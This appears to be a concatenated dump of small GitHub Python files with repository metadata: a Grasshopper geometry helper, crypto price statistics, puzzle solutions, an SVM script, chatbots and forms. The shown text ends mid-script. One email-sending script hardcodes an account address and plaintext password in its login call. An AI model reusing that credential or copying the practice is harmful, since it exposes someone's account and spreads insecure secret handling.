InterpolatedCurve from (x1,y1,z1,...,xn,yn,zn,)\\\n or (PT1,PT2,PT3)\"\n ##! not on CPLANE yet\n if not isinstance(args[0],Point3d):\n assert len(args)%3 == 0, \"argruments number not match\"\n pts = list_to_point(args)\n rpts = [CPLANE.RemapToPlaneSpace(p)[1] for p in pts]\n\n crv = Curve.CreateInterpolatedCurve(rpts,3)\n if AUTO_DISPLAY:\n Display(crv)\n return crv\ndef rect(x1,y1,x2,y2):\n rec = Rectangle3d(CPLANE,Point3d(x1,y1,0),Point3d(x2,y2,0))\n if AUTO_DISPLAY:\n Display(rec)\n return rec\ndef ellipse(x,y,a,b):\n pl = Plane(CPLANE)\n pl.Translate(Vector3d(x,y,0))\n ell = Ellipse(pl,a,b)\n if AUTO_DISPLAY:\n Display(ell)\n return ell\ndef polygon(x,y,r,n=5):\n \" draw polygon like the component \"\n c = Circle(CPLANE.PointAt(x,y,0),r)\n pts = [c.PointAt(i*2*PI/n) for i in range(n+1)]\n pline = Polyline(pts)\n if AUTO_DISPLAY:\n Display(pline)\n return pline\ndef text(content,x,y,z=0,height=None):\n \" add text to screen \"\n te = TextEntity()\n te.Text = content\n te.Plane = CPLANE\n if height:\n te.TextHeight = height\n te.Translate(Vector3d(CPLANE.PointAt(x,y,z)))\n txtcrvs = Curve.JoinCurves(te.Explode())\n if AUTO_DISPLAY:\n for crv in txtcrvs:\n Display(crv)\n return txtcrvs\n\n### help func?\ndef constrain_region( pt,geo):\n Max = geo.GetBoundingBox(CPLANE).Max\n Min = geo.GetBoundingBox(CPLANE).Min\n pt.X = Rhino.RhinoMath.Clamp(pt.X,Min.X,Max.X)\n pt.Y = Rhino.RhinoMath.Clamp(pt.Y,Min.Y,Max.Y)\n pt.Z = Rhino.RhinoMath.Clamp(pt.Z,Min.Z,Max.Z)\n return pt\n\n\n\"\"\"def _insureRightOutput(ghenv):\n # slove multiply instance problem\n global GeoOut,ColorOut\n GeoOut = ghenv.LocalScope.GeoOut = DataTree[object](ghenv.Component.Params.Output[1].VolatileData)\n ColorOut = ghenv.LocalScope.ColorOut = DataTree[object](ghenv.Component.Params.Output[2].VolatileData)\"\"\"\n# buildin func\ndef show_grid(switch = False):\n \" turn off cplane grid \"\n Rhino.RhinoDoc.ActiveDoc.Views.ActiveView.ActiveViewport.ConstructionGridVisible = switch\n Rhino.RhinoDoc.ActiveDoc.Views.ActiveView.ActiveViewport.ConstructionAxesVisible = switch\ndef get_class(ghenv):\n param = ghenv.Component.Params.Input[1]\n for data in param.VolatileData.AllData(True):\n cls = data.Value\n ghenv.Script.SetVariable(cls.__name__, cls)\ndef unIntellisense(ghenv):\n for k,v in globals().items():\n ghenv.Script.SetIntellisenseVariable(k,v)\ndef get_params(_ghenv):\n global_dict = globals()\n for param in _ghenv.Component.Params:\n name = param.NickName\n global_dict.update({name:_ghenv.Script.GetVariable(name)})\ndef glob():\n return globals()\ndef recive_from_gh(_ghenv):\n ## get ALL var overwrite this\n get_params(_ghenv)\n source = _ghenv.Component.Code.split(\"custom code below\")[1].split(\"custom code above\")[0].replace('\\r','')\n exec(source)\n globals().update(locals())\n \"\"\"\n global_dict = globals()\n for name in _ghenv.Script.GetVariableNames():\n global_dict.update({name:_ghenv.Script.GetVariable(name)})\"\"\"\ndef noLoop():\n INFO.IS_LOOP = False\ndef setup():\n \"run once when RESET == True\"\n noLoop()\ndef draw():\n \"continuous run when RESET == False\"\n noLoop()\ndef GO(ghenv):\n global _ghenv\n switch = ghenv != _ghenv\n _ghenv = ghenv\n if ghenv not in all_processing:\n this_p = Processing(ghenv)\n all_processing[ghenv] = this_p\n else:\n this_p = all_processing[ghenv]\n if switch:\n this_p.switch()\n param = ghenv.Component.Params.Input[0]\n RESET = True\n for data in param.VolatileData.AllData(True):\n RESET = data.Value\n if RESET:\n this_p.initialize()# restore the global var to this process\n setup()#run setup\n elif INFO.IS_LOOP:\n INFO.LOOP_COUNT += 1\n update_mouse()\n get_params(ghenv)\n #print 'before draw',ghenv.LocalScope.GeoOut\n draw()\n #print \"final\",ghenv.LocalScope.GeoOut\nclass Processing:\n \"store the runing state of every instance\"\n count = 0\n def __init__(self,ghenv):\n Processing.count += 1\n print(\"create new p, %s in total\"%(Processing.count))\n self.env = ghenv\n # placeholder for instance, can be deleted\n self.STYLE = Style()\n self.STYLESTACK = []\n self._CPLANESTACK = []\n self.CPLANE = Plane.WorldXY\n self.AUTO_DISPLAY = True\n self.GEOMETRY_OUTPUT = True\n self.COLOR_OUTPUT = False\n self.GeoOut = ghenv.LocalScope.GeoOut = DataTree[object]()\n self.ColorOut = ghenv.LocalScope.ColorOut = DataTree[Color]()\n self.INFO = Info()\n self._SHAPESTACK = []\n def initialize(self,name = 'processing',autodisplay = True,geometry_output = True,color_output = False):\n # initilize placeholder\n global INFO,AUTO_DISPLAY,\\\n CPLANE,_CPLANESTACK,\\\n STYLE,STYLESTACK,\\\n GeoOut,ColorOut,\\\n GEOMETRY_OUTPUT,COLOR_OUTPUT,\\\n _SHAPESTACK\n INFO = Info()\n INFO.TIME = time.clock()\n _CPLANESTACK = []\n CPLANE = Plane.WorldXY\n _SHAPESTACK = []\n STYLESTACK = []\n STYLE = Style()\n AUTO_DISPLAY = autodisplay\n GEOMETRY_OUTPUT = geometry_output\n COLOR_OUTPUT = color_output\n GeoOut = self.env.LocalScope.GeoOut\n ColorOut = self.env.LocalScope.ColorOut\n _clearOutput()\n get_class(self.env)\n recive_from_gh(self.env)\n print(\"environment was reseted\")\n def switch(self):\n # retain this instance's envonriment\n global INFO,AUTO_DISPLAY,\\\n CPLANE,_CPLANESTACK,\\\n STYLE,STYLESTACK,\\\n GeoOut,ColorOut,\\\n GEOMETRY_OUTPUT,COLOR_OUTPUT,\\\n _SHAPESTACK\n CPLANE = self.CPLANE\n _CPLANESTACK = self._CPLANESTACK\n STYLE = self.STYLE\n STYLESTACK = self.STYLESTACK\n INFO = self.INFO\n #! why theses are diffrent?\n GeoOut = self.env.LocalScope.GeoOut = self.GeoOut\n ColorOut = self.env.LocalScope.ColorOut = self.ColorOut\n GEOMETRY_OUTPUT = self.GEOMETRY_OUTPUT\n COLOR_OUTPUT = self.COLOR_OUTPUT\n AUTO_DISPLAY = self.AUTO_DISPLAY\n _SHAPESTACK = self._SHAPESTACK\n recive_from_gh(self.env)\n def __del__(self):\n Processing.count -= 1\n super(Processing.self).__del__()\n","repo_name":"ForestoShen/processing.gh","sub_path":"pgh/new_core.py","file_name":"new_core.py","file_ext":"py","file_size_in_byte":20374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15406072776","text":"\"\"\"\nThis module contains the main statistical functions of Pandas:\n - variation\n - ath\n - correlation\n-----------------------------------------------------------------------------------------------\n\"\"\"\n\nimport numpy as np, pandas as pd\nfrom datetime import datetime\nfrom IPython.display import display\n\ndef variation(dataframes):\n \"\"\"\n Note. Currently, this functions only works for a Daily-based Analysis.\n\n INPUT PARAMETERS\n - A list of Dataframes (as a Dictionary).\n \n OUTPUT PARAMETERS\n - The percentage variation of prices in a new dataframe (one day, one week, one month, three month, one year).\n -----------------------------------------------------------------------------------------------\n \"\"\"\n\n df_columns = []\n for dataframe in dataframes:\n df = dataframe[\"df\"]\n currency = dataframe[\"from_currency\"]\n \n var_df = {\"Day (%)\": [], \"Week (%)\": [], \"Month (%)\": [], \"Year (%)\": []}\n\n for time in (1, 7, 30, 365): # A Series for each currency will be created\n if time == 1:\n period = \"Day (%)\"\n elif time == 7:\n period = \"Week (%)\"\n elif time == 30:\n period = \"Month (%)\"\n elif time == 365:\n period = \"Year (%)\"\n \n s_value = df.loc[:,\"Close\"]\n perc_var = s_value.pct_change(periods=time)[time] # This Pandas method returns the percentage variation of two different closing (Delta: time)\n \n var_df[period] = np.round(-perc_var*100,2)\n\n df_columns.append(pd.Series(var_df, name=currency)) # Each Series is appended to a List\n new_df = pd.concat(df_columns, axis=1) # Then, the list of Series is concatenated in a DataFrame\n new_df.index.name = \"Variation\"\n return display(new_df)\n\ndef ath(dataframe):\n \"\"\"\n INPUT PARAMETERS\n - A Dataframe (as a Dictionary).\n \n OUTPUT PARAMETERS\n - The all-time-high value recorded and the day in which the ATH was reached.\n -----------------------------------------------------------------------------------------------\n \"\"\"\n\n df = dataframe[\"df\"]\n currency = dataframe[\"from_currency\"]\n\n max_value = df.loc[:,\"High\"].max()\n data_max = df[df.loc[:,\"High\"]==max_value].index[0].strftime(\"%Y-%m-%d\")\n return print(f\"\\nThe highest value recorded for {currency} is:\\t{np.round(max_value,2).astype(str).rjust(10)} €\\tin {data_max}\")\n\ndef correlation(dataframe):\n \"\"\"\n INPUT PARAMETERS\n - A Dataframe (as a Dictionary).\n \n OUTPUT PARAMETERS\n - The correlation between the price of a currency and his market capitalization.\n -----------------------------------------------------------------------------------------------\n \"\"\"\n\n df = dataframe[\"df\"]\n currency = dataframe[\"from_currency\"]\n\n s1 = df.loc[:,[\"Open\", \"Close\"]].aggregate(func=\"mean\", axis=1)\n s2 = df.loc[:,\"Volume\"]\n corr = np.round(s1.corr(s2), 3)\n\n if corr < 0.3:\n corr_result = f\"NO correlation between value and market capitalization of \"\n elif corr < 0.6:\n corr_result = f\"a MEDIUM correlation between value and market capitalization of \"\n elif corr < 0.9:\n corr_result = f\"a STRONG correlation between value and market capitalization of \"\n else:\n corr_result = f\"a FULL correlation between value and market capitalization of \"\n \n return print(f\"\\nThere is {corr_result}{currency}:\\t{corr}\")\n\ndef disp(dataframe):\n \"\"\"\n This function was made to display correctly the DataFrame.\n\n INPUT PARAMETERS\n - A Dataframe (as a Dictionary).\n \n OUTPUT PARAMETERS\n - The Dataframe.\n -----------------------------------------------------------------------------------------------\n \"\"\"\n\n df = dataframe[\"df\"]\n return display(df)\n\ndef stat_func(dataframe):\n \"\"\"\n This functions returns the Median, Mean and Deviation Standard for opening price for the selected currency\n\n INPUT PARAMETERS\n - Dataframe (as a Dictionary)\n\n OUTPUT PARAMETERS\n - Statistical parameters (Median, Mean and Deviation Standard)\n - Mean price value over years\n \"\"\"\n\n df = dataframe[\"df\"]\n currency = dataframe[\"from_currency\"]\n\n print(f\"\\nMain statistical parameters for {currency} opening values\")\n display(df[\"Open\"].aggregate(func=[\"median\", \"mean\", \"std\"]).to_frame())\n\n print(f\"\\nMean {currency} price year over years has been:\")\n display(df[\"Open\"].groupby([df.index.year]).mean())\n return None","repo_name":"gtroisi/crypto-chart-visualization","sub_path":"package/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15498756805","text":"class Solution:\n def isPalindrome(self, s: str) -> bool:\n left = 0\n rght = len(s) - 1\n\n while left < rght:\n while left < rght and not (s[left].isalpha() or s[left].isnumeric()): \n left += 1\n while left < rght and not (s[rght].isalpha() or s[rght].isnumeric()): \n rght -= 1\n\n if s[left].lower() != s[rght].lower(): return False\n\n left += 1\n rght -= 1\n \n return True","repo_name":"Ahmad-Abdalmageed/Problem-Solving","sub_path":"LeetCodeSolutions/problems/valid_palindrome/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"24147233157","text":"from sklearn import svm\nimport numpy as np\nfrom sklearn.model_selection import KFold, cross_val_score\n\n\ndc_feas_filename = 'dataset/dc_feas.txt'\ndcglobal_feas_filename = 'dataset/dcglobal_feas.txt'\nreho_feas_filename = 'dataset/reho_feas.txt'\nfalff_feas_filename = 'dataset/falff_feas.txt'\ndc_feas_data = np.loadtxt(dc_feas_filename, dtype=np.float32)\ndcglobal_feas_data = np.loadtxt(dcglobal_feas_filename, dtype=np.float32)\nreho_feas_data = np.loadtxt(reho_feas_filename, dtype=np.float32)\nfalff_feas_data = np.loadtxt(falff_feas_filename, dtype=np.float32)\nprint(dcglobal_feas_data.shape)\n# exit()\ndata = np.zeros([dcglobal_feas_data.shape[0], dcglobal_feas_data.shape[1], 4], dtype=float,order='C')\ndata[:,:,0] = dc_feas_data\ndata[:,:,1] = dcglobal_feas_data\ndata[:,:,2] = reho_feas_data\ndata[:,:,3] = falff_feas_data\nprint('load data end...')\n\nk_fold = KFold(n_splits=10)\ntrain = []\ntest = []\naccuracys = []\nfor train_indices, test_indices in k_fold.split(data):\n train = data[train_indices]\n test = data[test_indices]\n\n train_labels = train[:, 0, 0].reshape(train.shape[0], 1, 1)\n train_feas = train[:, 1:, :]\n test_labels = test[:, 0, 0].reshape(test.shape[0], 1, 1)\n test_feas = test[:, 1:, :]\n clf = svm.LinearSVC()\n re = clf.fit(train_feas, train_labels)\n print('svm_multi fit end')\n predict = 0\n for i in range(test_feas.shape[0]):\n a = clf.predict([test_feas[i]])\n if a[0] == test_labels[i]:\n predict+=1\n accuracy = float(predict/test_feas.shape[0])\n accuracys.append(accuracy)\n print(accuracy)\n exit()\nprint(np.mean(accuracys))\n\n","repo_name":"DoubleYing/medicial_prediction","sub_path":"svm_multi.py","file_name":"svm_multi.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"32543078234","text":"import re\nfrom collections import Counter\n\n\ndef expand(polymer, rules):\n i = 0\n new_polymer = \"\"\n for i in range(len(polymer)):\n substr = polymer[i : i + 2] if i < (len(polymer) - 1) else polymer[i]\n if substr in rules:\n new_polymer += substr[0] + rules[substr]\n else:\n new_polymer += substr[0]\n return new_polymer\n\n\ndef expand_ntimes(init_polymer, rules, n):\n polymer = init_polymer\n for _ in range(n):\n polymer = expand(polymer, rules)\n return polymer\n\n\n\"\"\"\nFor part 2 thanks to\nhttps://dev.to/qviper/advent-of-code-2021-python-solution-day-14-4395\n\"\"\"\n\n\ndef count_expand(polymer, rules, n):\n tmp_poly = Counter(a + b for a, b in zip(polymer, polymer[1:]))\n chars = Counter(polymer)\n\n for _ in range(n):\n tmp = Counter()\n for (c1, c2), value in tmp_poly.items():\n mc = rules[c1 + c2]\n tmp[c1 + mc] += value\n tmp[mc + c2] += value\n chars[mc] += value\n tmp_poly = tmp\n return max(chars.values()) - min(chars.values())\n\n\ndef least_most_common(string):\n counter = Counter(string)\n common = Counter(string).most_common(len(string))\n return common[0], common[-1]\n\n\nwith open(\"input.txt\") as file:\n contents = file.read()\n contents = contents.split(\"\\n\\n\")\n polymer = contents[0]\n rules = re.findall(\"(\\w+)\\s+->\\s+(\\w+)\", contents[1])\n rules = {k: v for k, v in rules}\n expansion = expand_ntimes(polymer, rules, 10)\n lmc = least_most_common(expansion)\n print(\n f\"The difference between most and least common is at 10 steps is {lmc[0][1] - lmc[1][1]}\"\n )\n\n diff = count_expand(polymer, rules, 40)\n print(f\"The difference between most and least common is at 40 steps is {diff}\")\n","repo_name":"nhrade/advent-of-code","sub_path":"day14/polymer.py","file_name":"polymer.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8005081234","text":"import smtplib\nfrom email.message import EmailMessage\n\nemail = EmailMessage()\nemail['from'] = 'erictestandopython@hotmail.com'\nemail['to'] = 'estorani_41@hotmail.com'\nemail['subject'] = 'Email project test'\n\nemail.set_content('conteudo do email, vamos ver')\n\nwith smtplib.SMTP(host='smtp-mail.outlook.com', port=587) as smtp:\n smtp.ehlo()\n smtp.starttls()\n smtp.login('erictestandopython@hotmail.com', 'Testandopython123')\n smtp.send_message(email)\n\n print('deu certo')\n\n\n# first attep fail\n# quando eu mudei do email['from'] para um email funcionou, quando colocava meu nome, nao funcionava\n","repo_name":"pie0my/Email-Project","sub_path":"sendingemail.py","file_name":"sendingemail.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72918046292","text":"from django import forms\nfrom database.models import User,Comment, Reply\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.contrib.auth import authenticate\n\n#The form that appears when a user clicks on comment. Only need a text field for a new comment\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ( 'text',)\n widgets = {\n 'text' : forms.Textarea(attrs={'class':'form-control'}),\n }\n\n#The form for whenever the user clicks on reply to a comment. Only need a text field for the reply\nclass ReplyForm(forms.ModelForm):\n class Meta:\n model = Reply\n fields = ( 'text',)\n widgets = {\n 'text' : forms.Textarea(attrs={'class':'form-control'}),\n }","repo_name":"DanielSimonChin/garage-sale-website","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5285023175","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n\ndef main():\n chatbot = ChatBot('New Bot')\n trainer = ChatterBotCorpusTrainer(chatbot)\n trainer.train(\"chatterbot.corpus.english\")\n print(chatbot.get_response(\"Hello, how are you today?\"))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"October-Studios/Discord-Stats-Bot","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19644146257","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport json\nimport aiml\nimport pkg_resources\nimport random\nimport requests\nimport sys\n\nsys.path.append(\"...\")\nfrom matchmaking_responder import matchmaking_responder\n\nmatchmaking_strings = {\"matchmaking_like\", \"matchmaking_dislike\", \"matchmaking_forget_like\",\n \"matchmaking_forget_dislike\", \"matchmaking_matchmake\"}\n\nclass matchmaking():\n def __init__(self, responder):\n print('[BOTS/MATCHMAKING] Starting...')\n\n self.aiml = aiml.Kernel()\n self.aiml.learn(\"bots/matchmaking/std-startup.xml\")\n self.aiml.respond(\"load aiml b\")\n\n self.matchmaking_responder = matchmaking_responder(responder)\n\n self.aiml_affirm = aiml.Kernel()\n self.aiml_affirm.learn(\"bots/matchmaking/std-startup-affirm.xml\")\n self.aiml_affirm.respond(\"load aiml b\")\n\n self.responder = responder\n\n self.utterance = ''\n self.mode = 0\n\n self.handoffLike = ''\n self.handoffStatus = 0\n\n self.forename_1, self.forename_2 = self.responder.getNames()\n\n self.lockcode = 1\n\n def check(self, intent, utterance, forename, driver):\n print('[BOTS/MATCHMAKING] Responding...')\n\n self.forename_1, self.forename_2 = self.responder.getNames()\n self.utterance = utterance\n\n self.aiml.respond(self.utterance)\n responder = self.aiml.getPredicate('responder')\n\n print('[BOTS/MATCHMAKING] Routing:', responder)\n\n if self.handoffStatus == 1:\n self.matchmaking_like_process_2()\n return -1\n else:\n if driver == 1:\n self.drivers()\n return self.lockcode\n else:\n if responder == \"matchmaking_like\":\n print(\"[BOTS/MATCHMAKING] matchmaking_like\")\n self.matchmaking_like()\n return self.lockcode\n\n elif responder == \"matchmaking_dislike\":\n print(\"[BOTS/MATCHMAKING] matchmaking_dislike\")\n self.matchmaking_dislike()\n return self.lockcode\n\n elif responder == \"matchmaking_forget_like\":\n print(\"[BOTS/MATCHMAKING] matchmaking_forget_like\")\n self.matchmaking_forget_like()\n return self.lockcode\n\n elif responder == \"matchmaking_forget_dislike\":\n print(\"[BOTS/MATCHMAKING] matchmaking_forget_dislike\")\n self.matchmaking_forget_dislike()\n return self.lockcode\n\n elif responder == \"matchmaking_matchmake\":\n print(\"[BOTS/MATCHMAKING] matchmaking_matchmake\")\n self.matchmaking_matchmake()\n return self.lockcode\n\n elif responder == \"matchmaking_enquire\":\n print(\"[BOTS/MATCHMAKING] matchmaking_enquire\")\n self.matchmaking_enquire()\n return self.lockcode\n \n else:\n response = \"Sorry, I didn't quite get that. Please try a different phrase.\"\n self.responder.respond(response)\n self.drivers()\n return self.lockcode\n\n def matchmaking_like(self):\n self.aiml.respond(self.utterance)\n predicate = self.aiml.getPredicate('like')\n\n url = \"http://localhost:3000/api/person/add/likeDislike\"\n\n payload = \"likeDislike=true&thing=\" + predicate + \"&forename=\" + self.forename_1.title()\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c4a150d4-eb1a-431d-b68a-1fc99aecf28d\"\n }\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n # Check if this is a common like, discusses if true\n commonLikeAvailable, text = self.quickCheck(predicate)\n\n test = random.uniform(0, 1)\n\n if commonLikeAvailable:\n if test > 0.5:\n # Check is user wants to know more\n self.matchmaking_like_process_1(predicate)\n else:\n response = text\n self.responder.respond(response)\n else:\n self.matchmaking_responder.responder_like(predicate)\n\n sufficientLikes = self.checkLikes()\n if sufficientLikes == True and self.handoffStatus == 0:\n self.driversMatchmaking()\n elif sufficientLikes == False and self.handoffStatus == 0:\n self.drivers()\n\n def matchmaking_dislike(self):\n self.aiml.respond(self.utterance)\n predicate = self.aiml.getPredicate('dislike')\n\n url = \"http://localhost:3000/api/person/add/likeDislike\"\n\n payload = \"likeDislike=false&thing=\" + predicate + \"&forename=\" + self.forename_1\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c4a150d4-eb1a-431d-b68a-1fc99aecf28d\"\n }\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n self.matchmaking_responder.responder_dislike(predicate)\n self.drivers()\n\n def matchmaking_forget_like(self):\n self.matchmaking_responder.responder_forget_like()\n\n def matchmaking_forget_dislike(self):\n self.matchmaking_responder.responder_forget_dislike()\n\n def matchmaking_matchmake(self):\n self.aiml.respond(self.utterance)\n friend = self.aiml.getPredicate('friend')\n thing = self.aiml.getPredicate('thing')\n matchmake = self.aiml.getPredicate('matchmake')\n\n sufficientLikes = self.checkLikes()\n if sufficientLikes == False:\n self.promptLikes()\n return\n\n if matchmake == \"GENERAL\":\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&forename_2=\" + self.forename_2 + \"&type=general\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n people = requests.request(\"POST\", url, data=payload, headers=headers)\n people = json.loads(str(people.text))\n\n myLikes = []\n friends = []\n things = []\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(person[\"forename\"] == self.forename_1):\n myLikes.append(like[\"thing\"])\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(like[\"thing\"] in myLikes and person[\"forename\"] != self.forename_1):\n friends.append(person[\"forename\"])\n things.append(like[\"thing\"])\n\n if len(friends) < 2:\n self.matchmaking_responder.responder_matchmake_not_found()\n else:\n rand = random.randint(0, len(friends)-1)\n self.matchmaking_responder.responder_matchmake_found(friends[rand], things[rand])\n self.driversMatchmaking()\n\n elif matchmake == \"SPECIFIC FRIEND\":\n self.forename_2 = friend.title()\n self.responder.setNames(self.forename_1, self.forename_2)\n\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&forename_2=\" + self.forename_2 + \"&type=specific_friend\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n likes = requests.request(\"POST\", url, data=payload, headers=headers)\n likes = json.loads(str(likes.text))\n\n if len(likes[\"commonLikes\"]) > 1:\n rand = random.randint(0, len(likes[\"commonLikes\"])-1)\n self.matchmaking_responder.responder_matchmake_found_specific_friend(likes[\"commonLikes\"][rand])\n else:\n response = \"Sorry, you do not have anything in common with \" + self.forename_2\n self.responder.respond(response)\n \n elif matchmake == \"SPECIFIC THING\":\n self.thing = thing\n\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&forename_2=\" + self.forename_2 + \"&type=general\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n people = requests.request(\"POST\", url, data=payload, headers=headers)\n people = json.loads(str(people.text))\n\n friends = []\n things = []\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(like[\"thing\"].lower() == self.thing.lower() and person[\"forename\"] != self.forename_1):\n friends.append(person[\"forename\"])\n things.append(like[\"thing\"])\n\n if len(friends) >= 1:\n rand = random.randint(0, len(friends)-1)\n self.matchmaking_responder.responder_matchmake_found(friends[rand], things[rand])\n else:\n response = \"Sorry, no one else you know likes \" + thing\n self.responder.respond(response)\n\n else:\n print('[BOTS/MATCHMAKING] Invalid responder value. Check bots/matchmaking/aiml/*.aiml')\n\n def matchmaking_enquire(self):\n self.aiml.respond(self.utterance)\n friend = self.aiml.getPredicate('friend')\n\n url = \"http://localhost:3000/api/person/likes\"\n\n payload = \"forename=\" + friend.title()\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c29574dd-a784-474d-8c8f-ba83177e0448\"\n }\n\n likes = requests.request(\"POST\", url, data=payload, headers=headers)\n likes = json.loads(str(likes.text))\n\n count = 0\n\n rand = random.randint(0, len(likes[\"likes\"])-1)\n self.matchmaking_responder.responder_matchmake_enquire(friend, likes[\"likes\"][rand][\"thing\"])\n\n def drivers(self):\n self.matchmaking_responder.responder_drivers()\n\n def driversMatchmaking(self):\n self.matchmaking_responder.responder_driversMatchmaking()\n\n def checkLikes(self):\n url = \"http://localhost:3000/api/person/likes\"\n\n payload = \"forename=\" + self.forename_1\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c29574dd-a784-474d-8c8f-ba83177e0448\"\n }\n\n likes = requests.request(\"POST\", url, data=payload, headers=headers)\n likes = json.loads(str(likes.text))\n\n count = 0\n for likes in likes[\"likes\"]:\n count = count + 1\n \n if count > 2:\n return True\n else:\n return False\n\n def quickCheck(self, like):\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&type=general\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n people = requests.request(\"POST\", url, data=payload, headers=headers)\n people = json.loads(str(people.text))\n\n myLikes = []\n friends = []\n things = []\n\n resp = 'null'\n canRespond = False\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(person[\"forename\"] == self.forename_1):\n myLikes.append(like[\"thing\"])\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(like[\"thing\"] in myLikes and person[\"forename\"] != self.forename_1):\n friends.append(person[\"forename\"])\n things.append(like[\"thing\"])\n\n if len(friends) > 2:\n rand = random.randint(0, len(friends)-1)\n resp = 'It looks like you and ' + friends[rand] + ' both like ' + things[rand]\n canRespond = True\n \n return canRespond, resp\n\n def matchmaking_like_process_1(self, like):\n self.handoffLike = like\n self.handoffStatus = 1\n\n affirmations = []\n affirmation = 'Would you like me to tell you more about ' + like + '?'\n affirmations.append(affirmation)\n affirmation = 'Should I talk some more about ' + like + '?'\n affirmations.append(affirmation)\n\n rand = random.randint(0, len(affirmations)-1)\n resp = affirmations[rand]\n self.responder.respond(resp)\n\n def matchmaking_like_process_2(self):\n self.aiml_affirm.respond(self.utterance)\n predicate = self.aiml_affirm.getPredicate('affirm')\n\n if predicate == \"YES\":\n self.matchmaking_like_process_3()\n elif predicate == \"NO\":\n self.handoffStatus = 0\n self.drivers()\n else:\n self.matchmaking_like_process_1(self.handoffLike)\n print('invalid case')\n\n def matchmaking_like_process_3(self):\n self.handoffStatus = 0\n self.responder.handoff(self.handoffLike)\n\n print('Handoff to Alana would happen here.')\n\n def promptLikes(self):\n self.matchmaking_responder.responder_promptLikes()","repo_name":"RainAlexandra/Pepper-AssistedLiving","sub_path":"NLU/bots/matchmaking/matchmaking.py","file_name":"matchmaking.py","file_ext":"py","file_size_in_byte":14024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"21826753148","text":"\"\"\"Program to create a task manager to help a company assign tasks, register users, view all tasks,\r\nview the tasks of a specific user and display statistics if user is the admin\"\"\"\r\n\r\n# PLEASE OPEN MY OVERVIEW FILES IN VS CODE, FOR SOME REASON THE NUMBERS ARENT LINED UP WHEN I OPEN THE FILES IN DROPBOX BUT THEY WERE ALIGNED ON MY SIDE\r\n\r\n#=====importing libraries=====================================================\r\nPURPLE = '\\033[95m'\r\nCYAN = '\\033[96m'\r\nDARKCYAN = '\\033[36m'\r\nBLUE = '\\033[94m'\r\nGREEN = '\\033[92m'\r\nYELLOW = '\\033[93m'\r\nRED = '\\033[91m'\r\nBOLD = '\\033[1m'\r\nUNDERLINE = '\\033[4m'\r\nEND = '\\033[0m'\r\nCBEIGE2 = '\\33[96m'\r\n\r\nfrom datetime import datetime\r\n\r\n#====Functions===================================================================\r\n\r\ndef reg_user():\r\n while True:\r\n if user == 'admin':\r\n print(f'\\n════════════════ {CYAN}Register A New User{END} ════════════════\\n')\r\n user_file = open('T26 Capstone 3/user.txt', 'a')\r\n new_user = input('Please enter a new username: \\t\\t')\r\n new_password = input('Please enter a password: 